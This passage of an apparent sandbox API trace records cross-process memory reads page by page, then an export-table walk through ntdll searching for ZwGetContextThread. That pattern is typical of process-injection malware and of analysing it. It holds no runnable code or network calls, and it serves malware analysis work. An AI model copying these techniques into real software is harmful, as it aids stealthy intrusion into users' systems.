NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x27bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x27bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x27be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x27bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x27c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x27c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x27c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x27c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x27c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x27c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x27c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x27c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x27c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x27c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x27ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x27cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x27cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x27cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x27ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x27cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x27d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x27d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x27d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x27d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x27d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x27d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x27d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x27d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x27d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x27d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x27da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x27db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x27dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x27dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x27de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x27df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x27e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x27e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x27e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x27e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x27e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x27e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x27e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x27e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x27e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x27e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x27ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x27eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x27ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x27ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x27ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x27ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x27f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x27f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x27f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x27f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x27f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x27f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x27f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x27f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x27f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x27f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x27fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x27fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x27fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x27fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x27fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x27ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2800000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2801000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2802000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2803000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2804000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2805000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.754] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwGetContextThread") returned -1 [0206.754] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgPrint", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwGetContextThread") returned -1 [0206.755] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0206.756] 